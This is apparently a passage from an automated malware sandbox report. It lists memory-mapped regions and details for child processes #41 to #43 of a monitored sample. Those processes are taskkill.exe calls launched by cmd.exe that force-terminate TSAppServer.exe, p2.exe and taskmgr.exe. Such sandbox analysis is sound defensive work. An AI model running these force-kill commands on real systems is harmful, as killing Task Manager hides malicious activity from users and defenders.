| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM TSAppServer.exe /IM TSAppServer.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:59 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8dc |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
854
0x
8C8
0x
8C0
0x
918
0x
8CC
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00230000 | 0x002effff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00380000 | 0x00395fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000570000 | 0x00570000 | 0x0066ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006c0000 | 0x006c0000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x0089ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000900000 | 0x00900000 | 0x0093ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000940000 | 0x00940000 | 0x0094ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000950000 | 0x00950000 | 0x00ad7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00c60fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x0206ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002070000 | 0x02070000 | 0x020affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000020d0000 | 0x020d0000 | 0x0210ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002250000 | 0x02250000 | 0x0228ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02290000 | 0x0255efff | Memory Mapped File | Readable |
|
|
|
|
| fastprox.dll | 0x6a570000 | 0x6a605fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a830000 | 0x6a91afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74b70000 | 0x74b87fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74b90000 | 0x74b9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74ba0000 | 0x74bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74bd0000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c30000 | 0x74c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c40000 | 0x74c4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c50000 | 0x74c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74c60000 | 0x74c70fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74c80000 | 0x74c8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c90000 | 0x74cc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #42 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM p2.exe /IM p2.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:58 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8f0 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
830
0x
84C
0x
85C
0x
844
0x
848
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00130000 | 0x00133fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x002e0000 | 0x002f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll.mui | 0x00300000 | 0x003bffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000500000 | 0x00500000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001da0000 | 0x01da0000 | 0x01e9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f80000 | 0x01f80000 | 0x01fbffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01fc0000 | 0x0228efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022a0000 | 0x022a0000 | 0x022dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022f0000 | 0x022f0000 | 0x0232ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x0238ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x0244ffff | Private Memory | Readable, Writable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a880000 | 0x6a915fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74b70000 | 0x74bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74bd0000 | 0x74be7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74bf0000 | 0x74bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74c00000 | 0x74c28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c30000 | 0x74c3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c40000 | 0x74c49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c50000 | 0x74c84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c90000 | 0x74c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74ca0000 | 0x74cb0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74cc0000 | 0x74cccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:58 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x82c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
960
0x
11C
0x
344
0x
860
0x
10C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
